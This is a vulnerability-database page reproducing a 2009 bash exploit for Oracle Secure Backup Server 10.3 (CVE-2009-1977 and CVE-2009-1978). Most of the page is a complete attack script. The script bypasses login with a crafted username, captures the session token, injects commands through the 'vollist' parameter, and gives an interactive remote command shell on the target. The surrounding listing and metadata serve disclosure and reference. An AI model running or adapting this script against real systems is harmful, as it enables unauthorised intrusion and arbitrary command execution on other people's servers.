Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass / Remote Code Injection

🗓️ 14 Sep 2009 00:00:00Reported by ikkiType

Oracle Secure Backup Server 10.3.0.1.0 - Auth Bypass / Code Injectio

Reporter	Title	Published	Views	Family All 32
0day.today	Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit	14 Sep 200900:00	–	zdt
Circl	CVE-2009-1977	14 Sep 200900:00	–	circl
Circl	CVE-2009-1978	14 Sep 200900:00	–	circl
Check Point Advisories	Oracle Secure Backup Administration Server Authentication Bypass (CVE-2009-1977)	27 Aug 200900:00	–	checkpoint_advisories
Check Point Advisories	Oracle Secure Backup Administration Server Command Injection (CVE-2009-1978)	24 Sep 200900:00	–	checkpoint_advisories
CVE	CVE-2009-1977	14 Jul 200923:00	–	cve
CVE	CVE-2009-1978	14 Jul 200923:00	–	cve
Cvelist	CVE-2009-1977	14 Jul 200923:00	–	cvelist
Cvelist	CVE-2009-1978	14 Jul 200923:00	–	cvelist
d2	DSquare Exploit Pack: D2SEC_ORA_SECBACK2	14 Jul 200923:30	–	d2

#!/bin/bash

#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978 

#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3

#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart 
#authentication bypass and a trivial command injection, resulting in arbitrary command execution. 

#References:
#http://www.zerodayinitiative.com/advisories/ZDI-09-058/
#http://www.zerodayinitiative.com/advisories/ZDI-09-059/

#Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
#Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009

clear
echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"

if [[ $# -ne 1 ]]
then
	echo "usage: ./$(basename $0) <target IP>"
	echo "i.e.: ./$(basename $0) 192.168.0.100"
	exit
fi

if ! which curl >/dev/null
then
	echo "'curl' is required in order to handle HTTPS connections"
    exit
fi

TARGET=$1

#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`

if [[ -z $session ]]
then
	echo "[!] Fatal error. No valid token has been retrieved"
	exit
fi

echo "[+] I got a valid token: $session"

#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`

if [[ -z $check ]]
then
	echo "[!] Fatal error. I cannot execute arbitrary commands"
	exit
fi

echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
echo
echo \>$check

while(true); do
	echo -n \>
	read -r cmd
	
	if [ "$cmd" == "EXIT" ]
	then
		echo "[+] Removing the temporary file and closing"
		shell="1%26del%20osb103shelltmp"
		curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
		exit
	fi
	
	#URLencode function
	cmd=`echo -n "$cmd"|od -t x1 -A n|tr " " %`
	shell="1%26$cmd>osb103shelltmp"
	curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
	echo "[+] Last successful command execution:"
	curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
done
#end

# milw0rm.com [2009-09-14]

14 Sep 2009 00:00Current

6.4Medium risk

Vulners AI Score6.4

CVSS 210

EPSS0.84063